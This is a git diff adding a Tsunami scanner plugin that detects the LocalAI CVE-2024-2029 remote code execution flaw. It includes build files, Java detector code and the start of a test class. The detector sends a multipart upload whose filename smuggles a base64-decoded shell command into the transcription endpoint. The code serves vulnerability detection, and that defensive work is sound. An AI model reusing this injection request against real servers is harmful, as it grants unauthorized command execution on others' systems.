diff --git a/community/detectors/localai_cve_2024_2029/README.md b/community/detectors/localai_cve_2024_2029/README.md new file mode 100644 index 000000000..f3590f6c0 --- /dev/null +++ b/community/detectors/localai_cve_2024_2029/README.md @@ -0,0 +1,15 @@ +# LocalAI CVE-2024-2029 RCE Detector + +This Tsunami plugin tests to see if the LocalAI Instances are vulnerable to CVE-2024-2029 or not. +Publicly exposed LocalAI instances that are vulnerable to this CVE can lead to +Remote Code Execution Vulnerability by attackers. + +## Build jar file for this plugin + +Using `gradlew`: + +```shell +./gradlew jar +``` + +Tsunami identifiable jar file is located at `build/libs` directory. diff --git a/community/detectors/localai_cve_2024_2029/build.gradle b/community/detectors/localai_cve_2024_2029/build.gradle new file mode 100644 index 000000000..7100e4ddc --- /dev/null +++ b/community/detectors/localai_cve_2024_2029/build.gradle @@ -0,0 +1,69 @@ +plugins { + id 'java-library' +} + +description = 'LocalAI CVE-2024-2029 RCE detector' +group = 'com.google.tsunami' +version = '0.0.1-SNAPSHOT' + +repositories { + maven { // The google mirror is less flaky than mavenCentral() + url 'https://maven-central.storage-download.googleapis.com/repos/central/data/' + } + mavenCentral() + mavenLocal() +} + +java { + sourceCompatibility = JavaVersion.VERSION_11 + targetCompatibility = JavaVersion.VERSION_11 + + jar.manifest { + attributes('Implementation-Title': name, + 'Implementation-Version': version, + 'Built-By': System.getProperty('user.name'), + 'Built-JDK': System.getProperty('java.version'), + 'Source-Compatibility': sourceCompatibility, + 'Target-Compatibility': targetCompatibility) + } + + javadoc.options { + encoding = 'UTF-8' + use = true + links 'https://docs.oracle.com/javase/8/docs/api/' + } + + // Log stacktrace to console when test fails. + test { + testLogging { + exceptionFormat = 'full' + showExceptions true + showCauses true + showStackTraces true + } + maxHeapSize = '1500m' + } +} + +ext { + tsunamiVersion = 'latest.release' + junitVersion = '4.13' + okhttpVersion = '3.12.0' + truthVersion = '1.0.1' + guiceVersion = '4.2.3' +} + +dependencies { + implementation "com.google.tsunami:tsunami-common:${tsunamiVersion}" + implementation "com.google.tsunami:tsunami-plugin:${tsunamiVersion}" + implementation "com.google.tsunami:tsunami-proto:${tsunamiVersion}" + implementation 'com.google.auto.value:auto-value:1.10.4' + + testImplementation "junit:junit:${junitVersion}" + testImplementation "com.google.inject:guice:${guiceVersion}" + testImplementation "com.google.inject.extensions:guice-testlib:${guiceVersion}" + testImplementation "com.google.truth:truth:${truthVersion}" + testImplementation "com.google.truth.extensions:truth-java8-extension:${truthVersion}" + testImplementation "com.google.truth.extensions:truth-proto-extension:${truthVersion}" + testImplementation "com.squareup.okhttp3:mockwebserver:${okhttpVersion}" +} diff --git a/community/detectors/localai_cve_2024_2029/gradle/wrapper/gradle-wrapper.jar b/community/detectors/localai_cve_2024_2029/gradle/wrapper/gradle-wrapper.jar new file mode 100644 index 000000000..2c3521197 Binary files /dev/null and b/community/detectors/localai_cve_2024_2029/gradle/wrapper/gradle-wrapper.jar differ diff --git a/community/detectors/localai_cve_2024_2029/gradle/wrapper/gradle-wrapper.properties b/community/detectors/localai_cve_2024_2029/gradle/wrapper/gradle-wrapper.properties new file mode 100644 index 000000000..d04736436 --- /dev/null +++ b/community/detectors/localai_cve_2024_2029/gradle/wrapper/gradle-wrapper.properties @@ -0,0 +1,7 @@ +distributionBase=GRADLE_USER_HOME +distributionPath=wrapper/dists +distributionUrl=https\://services.gradle.org/distributions/gradle-7.0-bin.zip +networkTimeout=10000 +validateDistributionUrl=true +zipStoreBase=GRADLE_USER_HOME +zipStorePath=wrapper/dists diff --git a/community/detectors/localai_cve_2024_2029/gradlew b/community/detectors/localai_cve_2024_2029/gradlew new file mode 100755 index 000000000..f5feea6d6 --- /dev/null +++ b/community/detectors/localai_cve_2024_2029/gradlew @@ -0,0 +1,252 @@ +#!/bin/sh + +# +# Copyright © 2015-2021 the original authors. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# https://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +# +# SPDX-License-Identifier: Apache-2.0 +# + +############################################################################## +# +# Gradle start up script for POSIX generated by Gradle. +# +# Important for running: +# +# (1) You need a POSIX-compliant shell to run this script. If your /bin/sh is +# noncompliant, but you have some other compliant shell such as ksh or +# bash, then to run this script, type that shell name before the whole +# command line, like: +# +# ksh Gradle +# +# Busybox and similar reduced shells will NOT work, because this script +# requires all of these POSIX shell features: +# * functions; +# * expansions «$var», «${var}», «${var:-default}», «${var+SET}», +# «${var#prefix}», «${var%suffix}», and «$( cmd )»; +# * compound commands having a testable exit status, especially «case»; +# * various built-in commands including «command», «set», and «ulimit». +# +# Important for patching: +# +# (2) This script targets any POSIX shell, so it avoids extensions provided +# by Bash, Ksh, etc; in particular arrays are avoided. +# +# The "traditional" practice of packing multiple parameters into a +# space-separated string is a well documented source of bugs and security +# problems, so this is (mostly) avoided, by progressively accumulating +# options in "$@", and eventually passing that to Java. +# +# Where the inherited environment variables (DEFAULT_JVM_OPTS, JAVA_OPTS, +# and GRADLE_OPTS) rely on word-splitting, this is performed explicitly; +# see the in-line comments for details. +# +# There are tweaks for specific operating systems such as AIX, CygWin, +# Darwin, MinGW, and NonStop. +# +# (3) This script is generated from the Groovy template +# https://github.com/gradle/gradle/blob/HEAD/platforms/jvm/plugins-application/src/main/resources/org/gradle/api/internal/plugins/unixStartScript.txt +# within the Gradle project. +# +# You can find Gradle at https://github.com/gradle/gradle/. +# +############################################################################## + +# Attempt to set APP_HOME + +# Resolve links: $0 may be a link +app_path=$0 + +# Need this for daisy-chained symlinks. +while + APP_HOME=${app_path%"${app_path##*/}"} # leaves a trailing /; empty if no leading path + [ -h "$app_path" ] +do + ls=$( ls -ld "$app_path" ) + link=${ls#*' -> '} + case $link in #( + /*) app_path=$link ;; #( + *) app_path=$APP_HOME$link ;; + esac +done + +# This is normally unused +# shellcheck disable=SC2034 +APP_BASE_NAME=${0##*/} +# Discard cd standard output in case $CDPATH is set (https://github.com/gradle/gradle/issues/25036) +APP_HOME=$( cd -P "${APP_HOME:-./}" > /dev/null && printf '%s +' "$PWD" ) || exit + +# Use the maximum available, or set MAX_FD != -1 to use that value. +MAX_FD=maximum + +warn () { + echo "$*" +} >&2 + +die () { + echo + echo "$*" + echo + exit 1 +} >&2 + +# OS specific support (must be 'true' or 'false'). +cygwin=false +msys=false +darwin=false +nonstop=false +case "$( uname )" in #( + CYGWIN* ) cygwin=true ;; #( + Darwin* ) darwin=true ;; #( + MSYS* | MINGW* ) msys=true ;; #( + NONSTOP* ) nonstop=true ;; +esac + +CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar + + +# Determine the Java command to use to start the JVM. +if [ -n "$JAVA_HOME" ] ; then + if [ -x "$JAVA_HOME/jre/sh/java" ] ; then + # IBM's JDK on AIX uses strange locations for the executables + JAVACMD=$JAVA_HOME/jre/sh/java + else + JAVACMD=$JAVA_HOME/bin/java + fi + if [ ! -x "$JAVACMD" ] ; then + die "ERROR: JAVA_HOME is set to an invalid directory: $JAVA_HOME + +Please set the JAVA_HOME variable in your environment to match the +location of your Java installation." + fi +else + JAVACMD=java + if ! command -v java >/dev/null 2>&1 + then + die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. + +Please set the JAVA_HOME variable in your environment to match the +location of your Java installation." + fi +fi + +# Increase the maximum file descriptors if we can. +if ! "$cygwin" && ! "$darwin" && ! "$nonstop" ; then + case $MAX_FD in #( + max*) + # In POSIX sh, ulimit -H is undefined. That's why the result is checked to see if it worked. + # shellcheck disable=SC2039,SC3045 + MAX_FD=$( ulimit -H -n ) || + warn "Could not query maximum file descriptor limit" + esac + case $MAX_FD in #( + '' | soft) :;; #( + *) + # In POSIX sh, ulimit -n is undefined. That's why the result is checked to see if it worked. + # shellcheck disable=SC2039,SC3045 + ulimit -n "$MAX_FD" || + warn "Could not set maximum file descriptor limit to $MAX_FD" + esac +fi + +# Collect all arguments for the java command, stacking in reverse order: +# * args from the command line +# * the main class name +# * -classpath +# * -D...appname settings +# * --module-path (only if needed) +# * DEFAULT_JVM_OPTS, JAVA_OPTS, and GRADLE_OPTS environment variables. + +# For Cygwin or MSYS, switch paths to Windows format before running java +if "$cygwin" || "$msys" ; then + APP_HOME=$( cygpath --path --mixed "$APP_HOME" ) + CLASSPATH=$( cygpath --path --mixed "$CLASSPATH" ) + + JAVACMD=$( cygpath --unix "$JAVACMD" ) + + # Now convert the arguments - kludge to limit ourselves to /bin/sh + for arg do + if + case $arg in #( + -*) false ;; # don't mess with options #( + /?*) t=${arg#/} t=/${t%%/*} # looks like a POSIX filepath + [ -e "$t" ] ;; #( + *) false ;; + esac + then + arg=$( cygpath --path --ignore --mixed "$arg" ) + fi + # Roll the args list around exactly as many times as the number of + # args, so each arg winds up back in the position where it started, but + # possibly modified. + # + # NB: a `for` loop captures its iteration list before it begins, so + # changing the positional parameters here affects neither the number of + # iterations, nor the values presented in `arg`. + shift # remove old arg + set -- "$@" "$arg" # push replacement arg + done +fi + + +# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. +DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' + +# Collect all arguments for the java command: +# * DEFAULT_JVM_OPTS, JAVA_OPTS, JAVA_OPTS, and optsEnvironmentVar are not allowed to contain shell fragments, +# and any embedded shellness will be escaped. +# * For example: A user cannot expect ${Hostname} to be expanded, as it is an environment variable and will be +# treated as '${Hostname}' itself on the command line. + +set -- \ + "-Dorg.gradle.appname=$APP_BASE_NAME" \ + -classpath "$CLASSPATH" \ + org.gradle.wrapper.GradleWrapperMain \ + "$@" + +# Stop when "xargs" is not available. +if ! command -v xargs >/dev/null 2>&1 +then + die "xargs is not available" +fi + +# Use "xargs" to parse quoted args. +# +# With -n1 it outputs one arg per line, with the quotes and backslashes removed. +# +# In Bash we could simply go: +# +# readarray ARGS < <( xargs -n1 <<<"$var" ) && +# set -- "${ARGS[@]}" "$@" +# +# but POSIX shell has neither arrays nor command substitution, so instead we +# post-process each arg (as a line of input to sed) to backslash-escape any +# character that might be a shell metacharacter, then use eval to reverse +# that process (while maintaining the separation between arguments), and wrap +# the whole thing up as a single "set" statement. +# +# This will of course break if any of these variables contains a newline or +# an unmatched quote. +# + +eval "set -- $( + printf '%s\n' "$DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS" | + xargs -n1 | + sed ' s~[^-[:alnum:]+,./:=@_]~\\&~g; ' | + tr '\n' ' ' + )" '"$@"' + +exec "$JAVACMD" "$@" diff --git a/community/detectors/localai_cve_2024_2029/gradlew.bat b/community/detectors/localai_cve_2024_2029/gradlew.bat new file mode 100644 index 000000000..9d21a2183 --- /dev/null +++ b/community/detectors/localai_cve_2024_2029/gradlew.bat @@ -0,0 +1,94 @@ +@rem +@rem Copyright 2015 the original author or authors. +@rem +@rem Licensed under the Apache License, Version 2.0 (the "License"); +@rem you may not use this file except in compliance with the License. +@rem You may obtain a copy of the License at +@rem +@rem https://www.apache.org/licenses/LICENSE-2.0 +@rem +@rem Unless required by applicable law or agreed to in writing, software +@rem distributed under the License is distributed on an "AS IS" BASIS, +@rem WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +@rem See the License for the specific language governing permissions and +@rem limitations under the License. +@rem +@rem SPDX-License-Identifier: Apache-2.0 +@rem + +@if "%DEBUG%"=="" @echo off +@rem ########################################################################## +@rem +@rem Gradle startup script for Windows +@rem +@rem ########################################################################## + +@rem Set local scope for the variables with windows NT shell +if "%OS%"=="Windows_NT" setlocal + +set DIRNAME=%~dp0 +if "%DIRNAME%"=="" set DIRNAME=. +@rem This is normally unused +set APP_BASE_NAME=%~n0 +set APP_HOME=%DIRNAME% + +@rem Resolve any "." and ".." in APP_HOME to make it shorter. +for %%i in ("%APP_HOME%") do set APP_HOME=%%~fi + +@rem Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. +set DEFAULT_JVM_OPTS="-Xmx64m" "-Xms64m" + +@rem Find java.exe +if defined JAVA_HOME goto findJavaFromJavaHome + +set JAVA_EXE=java.exe +%JAVA_EXE% -version >NUL 2>&1 +if %ERRORLEVEL% equ 0 goto execute + +echo. 1>&2 +echo ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. 1>&2 +echo. 1>&2 +echo Please set the JAVA_HOME variable in your environment to match the 1>&2 +echo location of your Java installation. 1>&2 + +goto fail + +:findJavaFromJavaHome +set JAVA_HOME=%JAVA_HOME:"=% +set JAVA_EXE=%JAVA_HOME%/bin/java.exe + +if exist "%JAVA_EXE%" goto execute + +echo. 1>&2 +echo ERROR: JAVA_HOME is set to an invalid directory: %JAVA_HOME% 1>&2 +echo. 1>&2 +echo Please set the JAVA_HOME variable in your environment to match the 1>&2 +echo location of your Java installation. 1>&2 + +goto fail + +:execute +@rem Setup the command line + +set CLASSPATH=%APP_HOME%\gradle\wrapper\gradle-wrapper.jar + + +@rem Execute Gradle +"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %* + +:end +@rem End local scope for the variables with windows NT shell +if %ERRORLEVEL% equ 0 goto mainEnd + +:fail +rem Set variable GRADLE_EXIT_CONSOLE if you need the _script_ return code instead of +rem the _cmd.exe /c_ return code! +set EXIT_CODE=%ERRORLEVEL% +if %EXIT_CODE% equ 0 set EXIT_CODE=1 +if not ""=="%GRADLE_EXIT_CONSOLE%" exit %EXIT_CODE% +exit /b %EXIT_CODE% + +:mainEnd +if "%OS%"=="Windows_NT" endlocal + +:omega diff --git a/community/detectors/localai_cve_2024_2029/settings.gradle b/community/detectors/localai_cve_2024_2029/settings.gradle new file mode 100644 index 000000000..df6cf179a --- /dev/null +++ b/community/detectors/localai_cve_2024_2029/settings.gradle @@ -0,0 +1 @@ +rootProject.name = 'localai_cve_2024_2029_detector' diff --git a/community/detectors/localai_cve_2024_2029/src/main/java/com/google/tsunami/plugins/detectors/rce/cve20242029/Annotations.java b/community/detectors/localai_cve_2024_2029/src/main/java/com/google/tsunami/plugins/detectors/rce/cve20242029/Annotations.java new file mode 100644 index 000000000..53ebc582c --- /dev/null +++ b/community/detectors/localai_cve_2024_2029/src/main/java/com/google/tsunami/plugins/detectors/rce/cve20242029/Annotations.java @@ -0,0 +1,35 @@ +/* + * Copyright 2024 Google LLC + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.google.tsunami.plugins.detectors.rce.cve20242029; + +import static java.lang.annotation.ElementType.FIELD; +import static java.lang.annotation.ElementType.METHOD; +import static java.lang.annotation.ElementType.PARAMETER; + +import java.lang.annotation.Retention; +import java.lang.annotation.RetentionPolicy; +import java.lang.annotation.Target; +import javax.inject.Qualifier; + +/** Annotation for {@link LocalAiCve20242029RceDetector}. */ +final class Annotations { + @Qualifier + @Retention(RetentionPolicy.RUNTIME) + @Target({PARAMETER, METHOD, FIELD}) + @interface OobSleepDuration {} + + private Annotations() {} +} diff --git a/community/detectors/localai_cve_2024_2029/src/main/java/com/google/tsunami/plugins/detectors/rce/cve20242029/LocalAiCve20242029RceDetector.java b/community/detectors/localai_cve_2024_2029/src/main/java/com/google/tsunami/plugins/detectors/rce/cve20242029/LocalAiCve20242029RceDetector.java new file mode 100644 index 000000000..496c704cc --- /dev/null +++ b/community/detectors/localai_cve_2024_2029/src/main/java/com/google/tsunami/plugins/detectors/rce/cve20242029/LocalAiCve20242029RceDetector.java @@ -0,0 +1,231 @@ +/* + * Copyright 2024 Google LLC + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +package com.google.tsunami.plugins.detectors.rce.cve20242029; + +import static com.google.common.base.Preconditions.checkNotNull; +import static com.google.common.collect.ImmutableList.toImmutableList; +import static com.google.common.net.HttpHeaders.CONTENT_TYPE; +import static com.google.tsunami.common.net.http.HttpRequest.get; +import static com.google.tsunami.common.net.http.HttpRequest.post; +import static java.nio.charset.StandardCharsets.UTF_8; + +import com.google.common.collect.ImmutableList; +import com.google.common.flogger.GoogleLogger; +import com.google.common.io.BaseEncoding; +import com.google.common.util.concurrent.Uninterruptibles; +import com.google.gson.JsonArray; +import com.google.gson.JsonElement; +import com.google.gson.JsonParseException; +import com.google.gson.JsonParser; +import com.google.protobuf.ByteString; +import com.google.protobuf.util.Timestamps; +import com.google.tsunami.common.data.NetworkServiceUtils; +import com.google.tsunami.common.net.http.HttpClient; +import com.google.tsunami.common.net.http.HttpHeaders; +import com.google.tsunami.common.net.http.HttpResponse; +import com.google.tsunami.common.time.UtcClock; +import com.google.tsunami.plugin.PluginType; +import com.google.tsunami.plugin.VulnDetector; +import com.google.tsunami.plugin.annotations.PluginInfo; +import com.google.tsunami.plugin.payload.PayloadGenerator; +import com.google.tsunami.plugins.detectors.rce.cve20242029.Annotations.OobSleepDuration; +import com.google.tsunami.proto.DetectionReport; +import com.google.tsunami.proto.DetectionReportList; +import com.google.tsunami.proto.DetectionStatus; +import com.google.tsunami.proto.NetworkService; +import com.google.tsunami.proto.PayloadGeneratorConfig; +import com.google.tsunami.proto.Severity; +import com.google.tsunami.proto.TargetInfo; +import com.google.tsunami.proto.Vulnerability; +import com.google.tsunami.proto.VulnerabilityId; +import java.io.ByteArrayOutputStream; +import java.io.IOException; +import java.time.Clock; +import java.time.Duration; +import java.time.Instant; +import javax.inject.Inject; + +/** A {@link VulnDetector} that detects exposed LocalAI API server. */ +@PluginInfo( + type = PluginType.VULN_DETECTION, + name = "ExposedLocalAIDetector", + version = "0.1", + description = + "This plugin detects exposed LocalAI API serve that vulnerable to cve-2024-2029." + + "this CVE allows attacker to inject arbitrary OS commands " + + "during a file upload upload by a POST HTTP request", + author = "TheVampKid", + bootstrapModule = LocalAiCve20242029RceDetectorBootstrapModule.class) +public final class LocalAiCve20242029RceDetector implements VulnDetector { + private static final GoogleLogger logger = GoogleLogger.forEnclosingClass(); + + private final PayloadGenerator payloadGenerator; + private final Clock utcClock; + private final HttpClient httpClient; + private final int oobSleepDuration; + + @Inject + LocalAiCve20242029RceDetector( + HttpClient httpClient, + @UtcClock Clock utcClock, + PayloadGenerator payloadGenerator, + @OobSleepDuration int oobSleepDuration) { + this.httpClient = checkNotNull(httpClient); + this.utcClock = checkNotNull(utcClock); + this.payloadGenerator = checkNotNull(payloadGenerator); + this.oobSleepDuration = oobSleepDuration; + } + + @Override + public DetectionReportList detect( + TargetInfo targetInfo, ImmutableList matchedServices) { + logger.atInfo().log("Starting LocalAI CVE-2024-2029 RCE detection."); + + return DetectionReportList.newBuilder() + .addAllDetectionReports( + matchedServices.stream() + .filter(NetworkServiceUtils::isWebService) + .filter(this::checkIfLocalAiWebService) + .filter(this::isServiceVulnerable) + .map(networkService -> buildDetectionReport(targetInfo, networkService)) + .collect(toImmutableList())) + .build(); + } + + private boolean checkIfLocalAiWebService(NetworkService networkService) { + String targetUrl = NetworkServiceUtils.buildWebApplicationRootUrl(networkService); + + String modelsUrl = targetUrl + "models"; + HttpResponse response; + try { + response = httpClient.send(get(modelsUrl).withEmptyHeaders().build(), networkService); + } catch (IOException e) { + logger.atWarning().withCause(e).log("Unable to query '%s'.", targetUrl); + return false; + } + if (response.bodyJson().isEmpty()) { + return false; + } + try { + return !response.bodyJson().get().getAsJsonObject().get("object").getAsString().isEmpty(); + } catch (IllegalStateException e) { + logger.atWarning().withCause(e).log("Unable to get response body as a JSON Object."); + } + return false; + } + + private boolean isServiceVulnerable(NetworkService networkService) { + var payload = + this.payloadGenerator.generate( + PayloadGeneratorConfig.newBuilder() + .setVulnerabilityType(PayloadGeneratorConfig.VulnerabilityType.REFLECTIVE_RCE) + .setInterpretationEnvironment( + PayloadGeneratorConfig.InterpretationEnvironment.LINUX_SHELL) + .setExecutionEnvironment( + PayloadGeneratorConfig.ExecutionEnvironment.EXEC_INTERPRETATION_ENVIRONMENT) + .build()); + + String targetUrl = NetworkServiceUtils.buildWebApplicationRootUrl(networkService); + + String modelsUrl = targetUrl + "models"; + try { + HttpResponse response = + httpClient.send(get(modelsUrl).withEmptyHeaders().build(), networkService); + if (response.bodyString().isEmpty()) { + return false; + } + JsonArray models = + JsonParser.parseString(response.bodyString().get()) + .getAsJsonObject() + .get("data") + .getAsJsonArray(); + + for (JsonElement model : models) { + String modelStr = model.getAsJsonObject().get("id").getAsString(); + // starting the building of the HTTP POST Body + ByteArrayOutputStream output = new ByteArrayOutputStream(); + output.write("--------------------------YMvF9bJTpBcQA5CcxzUEx3\r\n".getBytes(UTF_8)); + output.write( + String.format( + "Content-Disposition: form-data; name=\"file\";" + + " filename=\"a;$(echo %s|base64 -d);\"\r\n\r\n", + BaseEncoding.base64().encode(payload.getPayload().getBytes(UTF_8))) + .getBytes(UTF_8)); + output.write("".getBytes(UTF_8)); // empty file + output.write("\r\n".getBytes(UTF_8)); + output.write("--------------------------YMvF9bJTpBcQA5CcxzUEx3\r\n".getBytes(UTF_8)); + output.write("Content-Disposition: form-data; name=\"model\"\r\n\r\n".getBytes(UTF_8)); + output.write(modelStr.getBytes(UTF_8)); + output.write("\r\n".getBytes(UTF_8)); + output.write("--------------------------YMvF9bJTpBcQA5CcxzUEx3--\r\n".getBytes(UTF_8)); + byte[] out = output.toByteArray(); + // end of the building of the HTTP POST Body + HttpResponse httpResponse = + httpClient.send( + post(targetUrl + "v1/audio/transcriptions") + .setHeaders( + HttpHeaders.builder() + .addHeader( + CONTENT_TYPE, + "multipart/form-data;" + + " boundary=------------------------YMvF9bJTpBcQA5CcxzUEx3") + .build()) + .setRequestBody(ByteString.copyFrom(out)) + .build(), + networkService); + if (httpResponse.bodyString().isEmpty()) { + continue; + } + if (payload.getPayloadAttributes().getUsesCallbackServer()) { + Uninterruptibles.sleepUninterruptibly(Duration.ofSeconds(oobSleepDuration)); + } + return payload.checkIfExecuted(httpResponse.bodyString().get()); + } + } catch (IllegalStateException | NullPointerException | JsonParseException e) { + logger.atWarning().withCause(e).log("Unable to parse response body as json"); + } catch (IOException e) { + logger.atWarning().withCause(e).log("Unable to query '%s'.", targetUrl); + } + return false; + } + + private DetectionReport buildDetectionReport( + TargetInfo targetInfo, NetworkService vulnerableNetworkService) { + return DetectionReport.newBuilder() + .setTargetInfo(targetInfo) + .setNetworkService(vulnerableNetworkService) + .setDetectionTimestamp(Timestamps.fromMillis(Instant.now(utcClock).toEpochMilli())) + .setDetectionStatus(DetectionStatus.VULNERABILITY_VERIFIED) + .setVulnerability( + Vulnerability.newBuilder() + .setMainId( + VulnerabilityId.newBuilder() + .setPublisher("TSUNAMI_COMMUNITY") + .setValue("CVE_2024_2029")) + .setSeverity(Severity.CRITICAL) + .setTitle("CVE-2024-2029 LocalAI Remote Code Execution") + .setRecommendation( + "LocalAI user should upgrade the LocalAI to the versions v2.10.0 and above.") + .setDescription( + "Publicly exposed LocalAI instances before v2.7.0 are vulnerable to" + + " Remote Code Execution Vulnerability. Attackers can inject arbitrary " + + "OS commands within the audio filename filed during uploading" + + " the audio file with a POST HTTP request and send it to the " + + "v1/audio/transcriptions endpoint.")) + .build(); + } +} diff --git a/community/detectors/localai_cve_2024_2029/src/main/java/com/google/tsunami/plugins/detectors/rce/cve20242029/LocalAiCve20242029RceDetectorBootstrapModule.java b/community/detectors/localai_cve_2024_2029/src/main/java/com/google/tsunami/plugins/detectors/rce/cve20242029/LocalAiCve20242029RceDetectorBootstrapModule.java new file mode 100644 index 000000000..3f05b3d76 --- /dev/null +++ b/community/detectors/localai_cve_2024_2029/src/main/java/com/google/tsunami/plugins/detectors/rce/cve20242029/LocalAiCve20242029RceDetectorBootstrapModule.java @@ -0,0 +1,39 @@ +/* + * Copyright 2024 Google LLC + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +package com.google.tsunami.plugins.detectors.rce.cve20242029; + +import com.google.inject.Provides; +import com.google.tsunami.plugin.PluginBootstrapModule; +import com.google.tsunami.plugins.detectors.rce.cve20242029.Annotations.OobSleepDuration; + +/** A {@link PluginBootstrapModule} for {@link LocalAiCve20242029RceDetector}. */ +public final class LocalAiCve20242029RceDetectorBootstrapModule extends PluginBootstrapModule { + + @Override + protected void configurePlugin() { + registerPlugin(LocalAiCve20242029RceDetector.class); + } + + @Provides + @OobSleepDuration + int provideOobSleepDuration(LocalAiCve20242029RceDetectorConfigs configs) { + if (configs.oobSleepDuration == 0) { + return 10; + } + return configs.oobSleepDuration; + } +} diff --git a/community/detectors/localai_cve_2024_2029/src/main/java/com/google/tsunami/plugins/detectors/rce/cve20242029/LocalAiCve20242029RceDetectorConfigs.java b/community/detectors/localai_cve_2024_2029/src/main/java/com/google/tsunami/plugins/detectors/rce/cve20242029/LocalAiCve20242029RceDetectorConfigs.java new file mode 100644 index 000000000..b9d278f18 --- /dev/null +++ b/community/detectors/localai_cve_2024_2029/src/main/java/com/google/tsunami/plugins/detectors/rce/cve20242029/LocalAiCve20242029RceDetectorConfigs.java @@ -0,0 +1,23 @@ +/* + * Copyright 2024 Google LLC + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.google.tsunami.plugins.detectors.rce.cve20242029; + +import com.google.tsunami.common.config.annotations.ConfigProperties; + +@ConfigProperties("plugins.community.detectors.rce.cve20242029") +final class LocalAiCve20242029RceDetectorConfigs { + int oobSleepDuration; +} diff --git a/community/detectors/localai_cve_2024_2029/src/test/java/com/google/tsunami/plugins/detectors/rce/cve20242029/LocalAiCve20242029RceDetectorTest.java b/community/detectors/localai_cve_2024_2029/src/test/java/com/google/tsunami/plugins/detectors/rce/cve20242029/LocalAiCve20242029RceDetectorTest.java new file mode 100644 index 000000000..28eb72f17 --- /dev/null +++ b/community/detectors/localai_cve_2024_2029/src/test/java/com/google/tsunami/plugins/detectors/rce/cve20242029/LocalAiCve20242029RceDetectorTest.java @@ -0,0 +1,200 @@ +/* + * Copyright 2024 Google LLC + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +package com.google.tsunami.plugins.detectors.rce.cve20242029; + +import static com.google.common.truth.extensions.proto.ProtoTruth.assertThat; +import static com.google.tsunami.common.data.NetworkEndpointUtils.forHostnameAndPort; + +import com.google.common.collect.ImmutableList; +import com.google.common.truth.Truth; +import com.google.inject.Guice; +import com.google.inject.testing.fieldbinder.Bind; +import com.google.inject.testing.fieldbinder.BoundFieldModule; +import com.google.inject.util.Modules; +import com.google.protobuf.util.Timestamps; +import com.google.tsunami.common.net.http.HttpClientModule; +import com.google.tsunami.common.time.testing.FakeUtcClock; +import com.google.tsunami.common.time.testing.FakeUtcClockModule; +import com.google.tsunami.plugin.payload.testing.FakePayloadGeneratorModule; +import com.google.tsunami.plugin.payload.testing.PayloadTestHelper; +import com.google.tsunami.plugins.detectors.rce.cve20242029.Annotations.OobSleepDuration; +import com.google.tsunami.proto.DetectionReport; +import com.google.tsunami.proto.DetectionReportList; +import com.google.tsunami.proto.DetectionStatus; +import com.google.tsunami.proto.NetworkService; +import com.google.tsunami.proto.Severity; +import com.google.tsunami.proto.TargetInfo; +import com.google.tsunami.proto.Vulnerability; +import com.google.tsunami.proto.VulnerabilityId; +import java.io.IOException; +import java.nio.charset.StandardCharsets; +import java.security.SecureRandom; +import java.time.Instant; +import java.util.Arrays; +import java.util.Objects; +import javax.inject.Inject; +import okhttp3.mockwebserver.Dispatcher; +import okhttp3.mockwebserver.MockResponse; +import okhttp3.mockwebserver.MockWebServer; +import okhttp3.mockwebserver.RecordedRequest; +import org.junit.After; +import org.junit.Before; +import org.junit.Test; +import org.junit.runner.RunWith; +import org.junit.runners.JUnit4; + +/** Unit tests for {@link LocalAiCve20242029RceDetector}. */ +@RunWith(JUnit4.class) +public final class LocalAiCve20242029RceDetectorTest { + private final FakeUtcClock fakeUtcClock = + 